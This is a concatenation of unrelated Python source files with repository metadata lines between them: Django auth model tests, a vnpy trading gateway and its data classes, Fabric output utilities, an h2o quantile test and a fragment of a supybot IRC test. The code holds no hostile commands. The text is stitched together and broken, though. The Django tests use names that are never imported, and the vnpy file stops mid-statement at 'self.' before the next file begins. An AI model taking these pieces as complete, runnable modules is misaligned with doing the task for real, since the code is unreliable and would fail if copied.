from django.contrib.auth.models import (
AbstractUser, Group, Permission, User, UserManager,
)
from django.contrib.contenttypes.models import ContentType
from django.core import mail
from django.db.models.signals import post_save
from django.test import TestCase, mock, override_settings
class NaturalKeysTestCase(TestCase):
def test_user_natural_key(self):
staff_user = User.objects.create_user(username='staff')
self.assertEqual(User.objects.get_by_natural_key('staff'), staff_user)
self.assertEqual(staff_user.natural_key(), ('staff',))
def test_group_natural_key(self):
users_group = Group.objects.create(name='users')
self.assertEqual(Group.objects.get_by_natural_key('users'), users_group)
class LoadDataWithoutNaturalKeysTestCase(TestCase):
fixtures = ['regular.json']
def test_user_is_created_and_added_to_group(self):
user = User.objects.get(username='my_username')
group = Group.objects.get(name='my_group')
self.assertEqual(group, user.groups.get())
class LoadDataWithNaturalKeysTestCase(TestCase):
fixtures = ['natural.json']
def test_user_is_created_and_added_to_group(self):
user = User.objects.get(username='my_username')
group = Group.objects.get(name='my_group')
self.assertEqual(group, user.groups.get())
class LoadDataWithNaturalKeysAndMultipleDatabasesTestCase(TestCase):
multi_db = True
def test_load_data_with_user_permissions(self):
# Create test contenttypes for both databases
default_objects = [
ContentType.objects.db_manager('default').create(
model='examplemodela',
app_label='app_a',
),
ContentType.objects.db_manager('default').create(
model='examplemodelb',
app_label='app_b',
),
]
other_objects = [
ContentType.objects.db_manager('other').create(
model='examplemodelb',
app_label='app_b',
),
ContentType.objects.db_manager('other').create(
model='examplemodela',
app_label='app_a',
),
]
# Now we create the test UserPermission
Permission.objects.db_manager("default").create(
name="Can delete example model b",
codename="delete_examplemodelb",
content_type=default_objects[1],
)
Permission.objects.db_manager("other").create(
name="Can delete example model b",
codename="delete_examplemodelb",
content_type=other_objects[0],
)
perm_default = Permission.objects.get_by_natural_key(
'delete_examplemodelb',
'app_b',
'examplemodelb',
)
perm_other = Permission.objects.db_manager('other').get_by_natural_key(
'delete_examplemodelb',
'app_b',
'examplemodelb',
)
self.assertEqual(perm_default.content_type_id, default_objects[1].id)
self.assertEqual(perm_other.content_type_id, other_objects[0].id)
class UserManagerTestCase(TestCase):
def test_create_user(self):
email_lowercase = '[email protected]'
user = User.objects.create_user('user', email_lowercase)
self.assertEqual(user.email, email_lowercase)
self.assertEqual(user.username, 'user')
self.assertFalse(user.has_usable_password())
def test_create_user_email_domain_normalize_rfc3696(self):
# According to http://tools.ietf.org/html/rfc3696#section-3
# the "@" symbol can be part of the local part of an email address
returned = UserManager.normalize_email(r'Abc\@[email protected]')
self.assertEqual(returned, r'Abc\@[email protected]')
def test_create_user_email_domain_normalize(self):
returned = UserManager.normalize_email('[email protected]')
self.assertEqual(returned, '[email protected]')
def test_create_user_email_domain_normalize_with_whitespace(self):
returned = UserManager.normalize_email('email\ [email protected]')
self.assertEqual(returned, 'email\ [email protected]')
def test_empty_username(self):
with self.assertRaisesMessage(ValueError, 'The given username must be set'):
User.objects.create_user(username='')
def test_create_user_is_staff(self):
email = '[email protected]'
user = User.objects.create_user('user', email, is_staff=True)
self.assertEqual(user.email, email)
self.assertEqual(user.username, 'user')
self.assertTrue(user.is_staff)
def test_create_super_user_raises_error_on_false_is_superuser(self):
with self.assertRaisesMessage(ValueError, 'Superuser must have is_superuser=True.'):
User.objects.create_superuser(
username='test', email='[email protected]',
password='test', is_superuser=False,
)
def test_create_superuser_raises_error_on_false_is_staff(self):
with self.assertRaisesMessage(ValueError, 'Superuser must have is_staff=True.'):
User.objects.create_superuser(
username='test', email='[email protected]',
password='test', is_staff=False,
)
class AbstractUserTestCase(TestCase):
def test_email_user(self):
# valid send_mail parameters
kwargs = {
"fail_silently": False,
"auth_user": None,
"auth_password": None,
"connection": None,
"html_message": None,
}
abstract_user = AbstractUser(email='[email protected]')
abstract_user.email_user(subject="Subject here",
message="This is a message", from_email="[email protected]", **kwargs)
# Test that one message has been sent.
self.assertEqual(len(mail.outbox), 1)
# Verify that test email contains the correct attributes:
message = mail.outbox[0]
self.assertEqual(message.subject, "Subject here")
self.assertEqual(message.body, "This is a message")
self.assertEqual(message.from_email, "[email protected]")
self.assertEqual(message.to, [abstract_user.email])
def test_last_login_default(self):
user1 = User.objects.create(username='user1')
self.assertIsNone(user1.last_login)
user2 = User.objects.create_user(username='user2')
self.assertIsNone(user2.last_login)
def test_user_double_save(self):
"""
Calling user.save() twice should trigger password_changed() once.
"""
user = User.objects.create_user(username='user', password='foo')
user.set_password('bar')
with mock.patch('django.contrib.auth.password_validation.password_changed') as pw_changed:
user.save()
self.assertEqual(pw_changed.call_count, 1)
user.save()
self.assertEqual(pw_changed.call_count, 1)
@override_settings(PASSWORD_HASHERS=PASSWORD_HASHERS)
def test_check_password_upgrade(self):
"""
password_changed() shouldn't be called if User.check_password()
triggers a hash iteration upgrade.
"""
user = User.objects.create_user(username='user', password='foo')
initial_password = user.password
self.assertTrue(user.check_password('foo'))
hasher = get_hasher('default')
self.assertEqual('pbkdf2_sha256', hasher.algorithm)
old_iterations = hasher.iterations
try:
# Upgrade the password iterations
hasher.iterations = old_iterations + 1
with mock.patch('django.contrib.auth.password_validation.password_changed') as pw_changed:
user.check_password('foo')
self.assertEqual(pw_changed.call_count, 0)
self.assertNotEqual(initial_password, user.password)
finally:
hasher.iterations = old_iterations
class IsActiveTestCase(TestCase):
"""
Tests the behavior of the guaranteed is_active attribute
"""
def test_builtin_user_isactive(self):
user = User.objects.create(username='foo', email='[email protected]')
# is_active is true by default
self.assertEqual(user.is_active, True)
user.is_active = False
user.save()
user_fetched = User.objects.get(pk=user.pk)
# the is_active flag is saved
self.assertFalse(user_fetched.is_active)
@override_settings(AUTH_USER_MODEL='auth_tests.IsActiveTestUser1')
def test_is_active_field_default(self):
"""
tests that the default value for is_active is provided
"""
UserModel = get_user_model()
user = UserModel(username='foo')
self.assertEqual(user.is_active, True)
# you can set the attribute - but it will not save
user.is_active = False
# there should be no problem saving - but the attribute is not saved
user.save()
user_fetched = UserModel._default_manager.get(pk=user.pk)
# the attribute is always true for newly retrieved instance
self.assertEqual(user_fetched.is_active, True)
class TestCreateSuperUserSignals(TestCase):
"""
Simple test case for ticket #20541
"""
def post_save_listener(self, *args, **kwargs):
self.signals_count += 1
def setUp(self):
self.signals_count = 0
post_save.connect(self.post_save_listener, sender=User)
def tearDown(self):
post_save.disconnect(self.post_save_listener, sender=User)
def test_create_user(self):
User.objects.create_user("JohnDoe")
self.assertEqual(self.signals_count, 1)
def test_create_superuser(self):
User.objects.create_superuser("JohnDoe", "[email protected]", "1")
self.assertEqual(self.signals_count, 1)
| vincepandolfo/django | tests/auth_tests/test_models.py | Python | bsd-3-clause | 10,053 |
# encoding: UTF-8
from eventEngine import *
# 默认空值
EMPTY_STRING = ''
EMPTY_UNICODE = u''
EMPTY_INT = 0
EMPTY_FLOAT = 0.0
# 方向常量
DIRECTION_NONE = u'无方向'
DIRECTION_LONG = u'多'
DIRECTION_SHORT = u'空'
DIRECTION_UNKNOWN = u'未知'
DIRECTION_NET = u'净'
# 开平常量
OFFSET_NONE = u'无开平'
OFFSET_OPEN = u'开仓'
OFFSET_CLOSE = u'平仓'
OFFSET_UNKNOWN = u'未知'
# 状态常量
STATUS_NOTTRADED = u'未成交'
STATUS_PARTTRADED = u'部分成交'
STATUS_ALLTRADED = u'全部成交'
STATUS_CANCELLED = u'已撤销'
STATUS_UNKNOWN = u'未知'
# 合约类型常量
PRODUCT_EQUITY = u'股票'
PRODUCT_FUTURES = u'期货'
PRODUCT_OPTION = u'期权'
PRODUCT_INDEX = u'指数'
PRODUCT_COMBINATION = u'组合'
# 期权类型
OPTION_CALL = u'看涨期权'
OPTION_PUT = u'看跌期权'
########################################################################
class VtGateway(object):
"""交易接口"""
#----------------------------------------------------------------------
def __init__(self, eventEngine):
"""Constructor"""
self.eventEngine = eventEngine
#----------------------------------------------------------------------
def onTick(self, tick):
"""市场行情推送"""
# 通用事件
event1 = Event(type_=EVENT_TICK)
event1.dict_['data'] = tick
self.eventEngine.put(event1)
# 特定合约代码的事件
event2 = Event(type_=EVENT_TICK+tick.vtSymbol)
event2.dict_['data'] = tick
self.eventEngine.put(event2)
#----------------------------------------------------------------------
def onTrade(self, trade):
"""成交信息推送"""
# 因为成交通常都是事后才会知道成交编号,因此只需要推送通用事件
event1 = Event(type_=EVENT_TRADE)
event1.dict_['data'] = trade
self.eventEngine.put(event1)
#----------------------------------------------------------------------
def onOrder(self, order):
"""订单变化推送"""
# 通用事件
event1 = Event(type_=EVENT_ORDER)
event1.dict_['data'] = order
self.eventEngine.put(event1)
# 特定订单编号的事件
event2 = Event(type_=EVENT_ORDER+order.vtOrderID)
event2.dict_['data'] = order
self.eventEngine.put(event2)
#----------------------------------------------------------------------
def onPosition(self, position):
"""持仓信息推送"""
# 通用事件
event1 = Event(type_=EVENT_POSITION)
event1.dict_['data'] = position
self.eventEngine.put(event1)
# 特定合约代码的事件
event2 = Event(type_=EVENT_POSITION+position.vtPositionName)
event2.dict_['data'] = position
self.eventEngine.put(event2)
#----------------------------------------------------------------------
def onAccount(self, account):
"""账户信息推送"""
# 通用事件
event1 = Event(type_=EVENT_ACCOUNT)
event1.dict_['data'] = account
self.eventEngine.put(event1)
# 特定合约代码的事件
event2 = Event(type_=EVENT_ACCOUNT+account.vtAccountID)
event2.dict_['data'] = account
self.eventEngine.put(event2)
#----------------------------------------------------------------------
def onError(self, error):
"""错误信息推送"""
# 通用事件
event1 = Event(type_=EVENT_ERROR)
event1.dict_['data'] = error
self.eventEngine.put(event1)
#----------------------------------------------------------------------
def onLog(self, log):
"""日志推送"""
# 通用事件
event1 = Event(type_=EVENT_LOG)
event1.dict_['data'] = log
self.eventEngine.put(event1)
#----------------------------------------------------------------------
def onContract(self, contract):
"""合约基础信息推送"""
# 通用事件
event1 = Event(type_=EVENT_CONTRACT)
event1.dict_['data'] = contract
self.eventEngine.put(event1)
#----------------------------------------------------------------------
def connect(self):
"""连接"""
pass
#----------------------------------------------------------------------
def subscribe(self):
"""订阅行情"""
pass
#----------------------------------------------------------------------
def sendOrder(self):
"""发单"""
pass
#----------------------------------------------------------------------
def cancelOrder(self):
"""撤单"""
pass
#----------------------------------------------------------------------
def close(self):
"""关闭"""
pass
########################################################################
class VtBaseData(object):
"""回调函数推送数据的基础类,其他数据类继承于此"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
self.gatewayName = EMPTY_STRING # Gateway名称
self.rawData = None # 原始数据
########################################################################
class VtTickData(VtBaseData):
"""Tick行情数据类"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
super(VtTickData, self).__init__()
# 代码相关
self.symbol = EMPTY_STRING # 合约代码
self.vtSymbol = EMPTY_STRING # 合约在vt系统中的唯一代码,通常是 Gateway名.合约代码
# 成交数据
self.lastPrice = EMPTY_FLOAT # 最新成交价
self.volume = EMPTY_INT # 最新成交量
self.openInterest = EMPTY_INT # 持仓量
self.tickTime = EMPTY_STRING # 更新时间
# 五档行情
self.bidPrice1 = EMPTY_FLOAT
self.bidPrice2 = EMPTY_FLOAT
self.bidPrice3 = EMPTY_FLOAT
self.bidPrice4 = EMPTY_FLOAT
self.bidPrice5 = EMPTY_FLOAT
self.askPrice1 = EMPTY_FLOAT
self.askPrice2 = EMPTY_FLOAT
self.askPrice3 = EMPTY_FLOAT
self.askPrice4 = EMPTY_FLOAT
self.askPrice5 = EMPTY_FLOAT
self.bidVolume1 = EMPTY_INT
self.bidVolume2 = EMPTY_INT
self.bidVolume3 = EMPTY_INT
self.bidVolume4 = EMPTY_INT
self.bidVolume5 = EMPTY_INT
self.askVolume1 = EMPTY_INT
self.askVolume2 = EMPTY_INT
self.askVolume3 = EMPTY_INT
self.askVolume4 = EMPTY_INT
self.askVolume5 = EMPTY_INT
########################################################################
class VtTradeData(VtBaseData):
"""成交数据类"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
super(VtTradeData, self).__init__()
# 代码编号相关
self.symbol = EMPTY_STRING # 合约代码
self.vtSymbol = EMPTY_STRING # 合约在vt系统中的唯一代码,通常是 Gateway名.合约代码
self.tradeID = EMPTY_STRING # 成交编号
self.vtTradeID = EMPTY_STRING # 成交在vt系统中的唯一编号,通常是 Gateway名.成交编号
self.orderID = EMPTY_STRING # 订单编号
self.vtOrderID = EMPTY_STRING # 订单在vt系统中的唯一编号,通常是 Gateway名.订单编号
# 成交相关
self.direction = EMPTY_UNICODE # 成交方向
self.offset = EMPTY_UNICODE # 成交开平仓
self.price = EMPTY_FLOAT # 成交价格
self.volume = EMPTY_INT # 成交数量
self.tradeTime = EMPTY_STRING # 成交时间
########################################################################
class VtOrderData(VtBaseData):
"""订单数据类"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
super(VtOrderData, self).__init__()
# 代码编号相关
self.symbol = EMPTY_STRING # 合约代码
self.vtSymbol = EMPTY_STRING # 合约在vt系统中的唯一代码,通常是 Gateway名.合约代码
self.orderID = EMPTY_STRING # 订单编号
self.vtOrderID = EMPTY_STRING # 订单在vt系统中的唯一编号,通常是 Gateway名.订单编号
# 报单相关
self.direction = EMPTY_UNICODE # 报单方向
self.offset = EMPTY_UNICODE # 报单开平仓
self.price = EMPTY_FLOAT # 报单价格
self.totalVolume = EMPTY_INT # 报单总数量
self.tradedVolume = EMPTY_INT # 报单成交数量
self.status = EMPTY_UNICODE # 报单状态
self.orderTime = EMPTY_STRING # 发单时间
self.cancelTime = EMPTY_STRING # 撤单时间
# CTP/LTS相关
self.frontID = EMPTY_INT # 前置机编号
self.sessionID = EMPTY_INT # 连接编号
########################################################################
class VtPositionData(VtBaseData):
"""持仓数据类"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
super(VtPositionData, self).__init__()
# 代码编号相关
self.symbol = EMPTY_STRING # 合约代码
self.vtSymbol = EMPTY_STRING # 合约在vt系统中的唯一代码,通常是 Gateway名.合约代码
# 持仓相关
self.direction = EMPTY_STRING # 持仓方向
self.position = EMPTY_INT # 持仓量
self.frozen = EMPTY_INT # 冻结数量
self.price = EMPTY_FLOAT # 持仓均价
self.vtPositionName = EMPTY_STRING # 持仓在vt系统中的唯一代码,通常是vtSymbol.方向
########################################################################
class VtAccountData(VtBaseData):
"""账户数据类"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
super(VtAccountData, self).__init__()
# 账号代码相关
self.accountID = EMPTY_STRING # 账户代码
self.vtAccountID = EMPTY_STRING # 账户在vt中的唯一代码,通常是 Gateway名.账户代码
# 数值相关
self.preBalance = EMPTY_FLOAT # 昨日账户结算净值
self.balance = EMPTY_FLOAT # 账户净值
self.available = EMPTY_FLOAT # 可用资金
self.commission = EMPTY_FLOAT # 今日手续费
self.margin = EMPTY_FLOAT # 保证金占用
self.closeProfit = EMPTY_FLOAT # 平仓盈亏
self.positionProfit = EMPTY_FLOAT # 持仓盈亏
########################################################################
class VtErrorData(VtBaseData):
"""错误数据类"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
super(VtErrorData, self).__init__()
self.errorID = EMPTY_STRING # 错误代码
self.errorMsg = EMPTY_UNICODE # 错误信息
########################################################################
class VtLogData(VtBaseData):
"""日志数据类"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
super(VtLogData, self).__init__()
self.logContent = EMPTY_UNICODE # 日志信息
########################################################################
class VtContractData(VtBaseData):
"""合约详细信息类"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
super(VtBaseData, self).__init__()
self.symbol = EMPTY_STRING
self.vtSymbol = EMPTY_STRING
self.productClass = EMPTY_STRING
self.size = EMPTY_INT
self.priceTick = EMPTY_FLOAT
# 期权相关
self.strikePrice = EMPTY_FLOAT
self.underlyingSymbol = EMPTY_STRING
self.optionType = EMPTY_UNICODE
########################################################################
class VtSubscribeReq:
"""订阅行情时传入的对象类"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
self.symbol = EMPTY_STRING
self.exchange = EMPTY_STRING
########################################################################
class VtOrderReq:
"""发单时传入的对象类"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
self.symbol = EMPTY_STRING
########################################################################
class VtCancelOrderReq:
"""撤单时传入的对象类"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
self.symbol = EMPTY_STRING
self.exchange = EMPTY_STRING
self.
| drongh/vnpy | vn.trader/gateway.py | Python | mit | 14,192 |
"""
Internal subroutines for e.g. aborting execution with an error message,
or performing indenting on multiline output.
"""
import sys
import textwrap
def abort(msg):
"""
Abort execution, print ``msg`` to stderr and exit with error status (1.)
This function currently makes use of `sys.exit`_, which raises
`SystemExit`_. Therefore, it's possible to detect and recover from inner
calls to `abort` by using ``except SystemExit`` or similar.
.. _sys.exit: http://docs.python.org/library/sys.html#sys.exit
.. _SystemExit: http://docs.python.org/library/exceptions.html#exceptions.SystemExit
"""
from fabric.state import output
if output.aborts:
print >> sys.stderr, "\nFatal error: " + str(msg)
print >> sys.stderr, "\nAborting."
sys.exit(1)
def warn(msg):
"""
Print warning message, but do not abort execution.
This function honors Fabric's :doc:`output controls
<../../usage/output_controls>` and will print the given ``msg`` to stderr,
provided that the ``warnings`` output level (which is active by default) is
turned on.
"""
from fabric.state import output
if output.warnings:
print >> sys.stderr, "\nWarning: %s\n" % msg
def indent(text, spaces=4, strip=False):
"""
Return ``text`` indented by the given number of spaces.
If text is not a string, it is assumed to be a list of lines and will be
joined by ``\\n`` prior to indenting.
When ``strip`` is ``True``, a minimum amount of whitespace is removed from
the left-hand side of the given string (so that relative indents are
preserved, but otherwise things are left-stripped). This allows you to
effectively "normalize" any previous indentation for some inputs.
"""
# Normalize list of strings into a string for dedenting. "list" here means
# "not a string" meaning "doesn't have splitlines". Meh.
if not hasattr(text, 'splitlines'):
text = '\n'.join(text)
# Dedent if requested
if strip:
text = textwrap.dedent(text)
prefix = ' ' * spaces
output = '\n'.join(prefix + line for line in text.splitlines())
# Strip out empty lines before/aft
output = output.strip()
# Reintroduce first indent (which just got stripped out)
output = prefix + output
return output
def puts(text, show_prefix=True, end="\n", flush=False):
"""
An alias for ``print`` whose output is managed by Fabric's output controls.
In other words, this function simply prints to ``sys.stdout``, but will
hide its output if the ``user`` :doc:`output level
</usage/output_controls>` is set to ``False``.
If ``show_prefix=False``, `puts` will omit the leading ``[hostname]``
which it tacks on by default. (It will also omit this prefix if
``env.host_string`` is empty.)
Newlines may be disabled by setting ``end`` to the empty string (``''``).
(This intentionally mirrors Python 3's ``print`` syntax.)
You may force output flushing (e.g. to bypass output buffering) by setting
``flush=True``.
.. versionadded:: 0.9.2
.. seealso:: `~fabric.utils.fastprint`
"""
from fabric.state import output, env
if output.user:
prefix = ""
if env.host_string and show_prefix:
prefix = "[%s] " % env.host_string
sys.stdout.write(prefix + str(text) + end)
if flush:
sys.stdout.flush()
def fastprint(text, show_prefix=False, end="", flush=True):
"""
Print ``text`` immediately, without any prefix or line ending.
This function is simply an alias of `~fabric.utils.puts` with different
default argument values, such that the ``text`` is printed without any
embellishment and immediately flushed.
It is useful for any situation where you wish to print text which might
otherwise get buffered by Python's output buffering (such as within a
processor intensive ``for`` loop). Since such use cases typically also
require a lack of line endings (such as printing a series of dots to
signify progress) it also omits the traditional newline by default.
.. note::
Since `~fabric.utils.fastprint` calls `~fabric.utils.puts`, it is
likewise subject to the ``user`` :doc:`output level
</usage/output_controls>`.
.. versionadded:: 0.9.2
.. seealso:: `~fabric.utils.puts`
"""
return puts(text=text, show_prefix=show_prefix, end=end, flush=flush)
def handle_prompt_abort():
import fabric.state
if fabric.state.env.abort_on_prompts:
abort("Needed to prompt, but abort-on-prompts was set to True!")
| apavlo/h-store | third_party/python/fabric/utils.py | Python | gpl-3.0 | 4,636 |
import unittest, time, sys, random, math, getpass
sys.path.extend(['.','..','../..','py'])
import h2o, h2o_cmd, h2o_import as h2i, h2o_util, h2o_browse as h2b, h2o_print as h2p
import h2o_summ
DO_TRY_SCIPY = False
if getpass.getuser()=='kevin' or getpass.getuser()=='jenkins':
DO_TRY_SCIPY = True
DO_MEDIAN = True
# FIX!. we seem to lose accuracy with fewer bins -> more iterations. Maybe we're leaking or ??
# this test failed (if run as user kevin) with 10 bins
MAX_QBINS = 1000 # pass
MAX_QBINS = 1000 # pass
# this one doesn't fail with 10 bins
# this failed. interestingly got same number as 1000 bin summary2 (the 7.433..
# on runifA.csv (2nd col?)
# MAX_QBINS = 20
# Exception: h2o quantile multipass is not approx. same as sort algo. h2o_util.assertApproxEqual failed comparing 7.43337413296 and 8.26268245. {'tol': 2e-07}.
MAX_QBINS = 27
class Basic(unittest.TestCase):
def tearDown(self):
h2o.check_sandbox_for_errors()
@classmethod
def setUpClass(cls):
global SEED
SEED = h2o.setup_random_seed()
h2o.init()
@classmethod
def tearDownClass(cls):
# h2o.sleep(3600)
h2o.tear_down_cloud()
def test_summary2_unifiles(self):
SYNDATASETS_DIR = h2o.make_syn_dir()
# new with 1000 bins. copy expected from R
tryList = [
('cars.csv', 'c.hex', [
(None, None,None,None,None,None),
('economy (mpg)', None,None,None,None,None),
('cylinders', None,None,None,None,None),
],
),
('runifA.csv', 'A.hex', [
(None, 1.00, 25.00, 50.00, 75.00, 100.0),
('x', -99.9, -44.7, 8.26, 58.00, 91.7),
],
),
# colname, (min, 25th, 50th, 75th, max)
('runif.csv', 'x.hex', [
(None, 1.00, 5000.0, 10000.0, 15000.0, 20000.00),
('D', -5000.00, -3735.0, -2443, -1187.0, 99.8),
('E', -100000.0, -49208.0, 1783.8, 50621.9, 100000.0),
('F', -1.00, -0.4886, 0.00868, 0.5048, 1.00),
],
),
('runifB.csv', 'B.hex', [
(None, 1.00, 2501.00, 5001.00, 7501.00, 10000.00),
('x', -100.00, -50.1, 0.974, 51.7, 100,00),
],
),
('runifC.csv', 'C.hex', [
(None, 1.00, 25002.00, 50002.00, 75002.00, 100000.00),
('x', -100.00, -50.45, -1.135, 49.28, 100.00),
],
),
]
timeoutSecs = 15
trial = 1
n = h2o.nodes[0]
lenNodes = len(h2o.nodes)
timeoutSecs = 60
for (csvFilename, hex_key, expectedCols) in tryList:
csvPathname = csvFilename
csvPathnameFull = h2i.find_folder_and_filename('smalldata', csvPathname, returnFullPath=True)
parseResult = h2i.import_parse(bucket='smalldata', path=csvPathname,
schema='put', hex_key=hex_key, timeoutSecs=10, doSummary=False)
print "Parse result['destination_key']:", parseResult['destination_key']
# We should be able to see the parse result?
inspect = h2o_cmd.runInspect(None, parseResult['destination_key'])
print "\n" + csvFilename
numRows = inspect["numRows"]
numCols = inspect["numCols"]
# okay to get more cols than we want
# okay to vary MAX_QBINS because we adjust the expected accuracy
summaryResult = h2o_cmd.runSummary(key=hex_key, max_qbins=MAX_QBINS)
h2o.verboseprint("summaryResult:", h2o.dump_json(summaryResult))
summaries = summaryResult['summaries']
scipyCol = 0
for expected, column in zip(expectedCols, summaries):
colname = column['colname']
if expected[0]:
self.assertEqual(colname, expected[0]), colname, expected[0]
else:
# if the colname is None, skip it (so we don't barf on strings on the h2o quantile page
scipyCol += 1
continue
quantile = 0.5 if DO_MEDIAN else .999
# h2o has problem if a list of columns (or dictionary) is passed to 'column' param
q = h2o.nodes[0].quantiles(source_key=hex_key, column=column['colname'],
quantile=quantile, max_qbins=MAX_QBINS, multiple_pass=2, interpolation_type=7) # for comparing to summary2
qresult = q['result']
qresult_single = q['result_single']
h2p.blue_print("h2o quantiles result:", qresult)
h2p.blue_print("h2o quantiles result_single:", qresult_single)
h2p.blue_print("h2o quantiles iterations:", q['iterations'])
h2p.blue_print("h2o quantiles interpolated:", q['interpolated'])
print h2o.dump_json(q)
# ('', '1.00', '25002.00', '50002.00', '75002.00', '100000.00'),
coltype = column['type']
nacnt = column['nacnt']
stats = column['stats']
stattype= stats['type']
print stattype
# FIX! we should compare mean and sd to expected?
# enums don't have mean or sd?
if stattype!='Enum':
mean = stats['mean']
sd = stats['sd']
zeros = stats['zeros']
mins = stats['mins']
maxs = stats['maxs']
print "colname:", colname, "mean (2 places):", h2o_util.twoDecimals(mean)
print "colname:", colname, "std dev. (2 places):", h2o_util.twoDecimals(sd)
pct = stats['pct']
print "pct:", pct
print ""
# the thresholds h2o used, should match what we expected
expectedPct= [0.01, 0.05, 0.1, 0.25, 0.33, 0.5, 0.66, 0.75, 0.9, 0.95, 0.99]
pctile = stats['pctile']
# figure out the expected max error
# use this for comparing to sklearn/sort
if expected[1] and expected[5]:
expectedRange = expected[5] - expected[1]
# because of floor and ceil effects due we potentially lose 2 bins (worst case)
# the extra bin for the max value, is an extra bin..ignore
expectedBin = expectedRange/(MAX_QBINS-2)
maxErr = 0.5 * expectedBin # should we have some fuzz for fp?
else:
print "Test won't calculate max expected error"
maxErr = 0
# hack..assume just one None is enough to ignore for cars.csv
if expected[1]:
h2o_util.assertApproxEqual(mins[0], expected[1], tol=maxErr, msg='min is not approx. expected')
if expected[2]:
h2o_util.assertApproxEqual(pctile[3], expected[2], tol=maxErr, msg='25th percentile is not approx. expected')
if expected[3]:
h2o_util.assertApproxEqual(pctile[5], expected[3], tol=maxErr, msg='50th percentile (median) is not approx. expected')
if expected[4]:
h2o_util.assertApproxEqual(pctile[7], expected[4], tol=maxErr, msg='75th percentile is not approx. expected')
if expected[5]:
h2o_util.assertApproxEqual(maxs[0], expected[5], tol=maxErr, msg='max is not approx. expected')
hstart = column['hstart']
hstep = column['hstep']
hbrk = column['hbrk']
hcnt = column['hcnt']
for b in hcnt:
# should we be able to check for a uniform distribution in the files?
e = .1 * numRows
# self.assertAlmostEqual(b, .1 * rowCount, delta=.01*rowCount,
# msg="Bins not right. b: %s e: %s" % (b, e))
if stattype!='Enum':
pt = h2o_util.twoDecimals(pctile)
print "colname:", colname, "pctile (2 places):", pt
mx = h2o_util.twoDecimals(maxs)
mn = h2o_util.twoDecimals(mins)
print "colname:", colname, "maxs: (2 places):", mx
print "colname:", colname, "mins: (2 places):", mn
# FIX! we should do an exec and compare using the exec quantile too
actual = mn[0], pt[3], pt[5], pt[7], mx[0]
print "min/25/50/75/max colname:", colname, "(2 places):", actual
print "maxs colname:", colname, "(2 places):", mx
print "mins colname:", colname, "(2 places):", mn
# don't check if colname is empty..means it's a string and scipy doesn't parse right?
# need to ignore the car names
if colname!='' and expected[scipyCol]:
# don't do for enums
# also get the median with a sort (h2o_summ.percentileOnSortedlist()
h2o_summ.quantile_comparisons(
csvPathnameFull,
skipHeader=True,
col=scipyCol,
datatype='float',
quantile=0.5 if DO_MEDIAN else 0.999,
# FIX! ignore for now
h2oSummary2=pctile[5 if DO_MEDIAN else 10],
h2oQuantilesApprox=qresult_single,
h2oQuantilesExact=qresult,
h2oSummary2MaxErr=maxErr,
)
if False and h2o_util.approxEqual(pctile[5], 0.990238116744, tol=0.002, msg='stop here'):
raise Exception("stopping to look")
scipyCol += 1
trial += 1
if __name__ == '__main__':
h2o.unit_main()
| rowhit/h2o-2 | py/testdir_single_jvm/test_summary2_unifiles.py | Python | apache-2.0 | 10,223 |
###
# Copyright (c) 2002-2005, Jeremiah Fincher
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
from supybot.test import *
import copy
import pickle
import supybot.ircmsgs as ircmsgs
import supybot.ircutils as ircutils
# The test framework used to provide these, but not it doesn't. We'll add
# messages to as we find bugs (if indeed we find bugs).
msgs = []
rawmsgs = []
class IrcMsgTestCase(SupyTestCase):
def testLen(self):
for msg in msgs:
if msg.prefix:
strmsg = str(msg)
self.failIf(len(msg) != len(strmsg) and \
strmsg.replace(':', '') == strmsg)
def testRepr(self):
IrcMsg = ircmsgs.IrcMsg
for msg in msgs:
self.assertEqual(msg, eval(repr(msg)))
def testStr(self):
for (rawmsg, msg) in zip(rawmsgs, msgs):
strmsg = str(msg).strip()
self.failIf(rawmsg != strmsg and \
strmsg.replace(':', '') == strmsg)
def testEq(self):
for msg in msgs:
self.assertEqual(msg, msg)
self.failIf(msgs and msgs[0] == []) # Comparison to unhashable type.
def testNe(self):
for msg in msgs:
self.failIf(msg != msg)
## def testImmutability(self):
## s = 'something else'
## t = ('foo', 'bar', 'baz')
## for msg in msgs:
## self.assertRaises(AttributeError, setattr, msg, 'prefix', s)
## self.assertRaises(AttributeError, setattr, msg, 'nick', s)
## self.assertRaises(AttributeError, setattr, msg, 'user', s)
## self.assertRaises(AttributeError, setattr, msg, 'host', s)
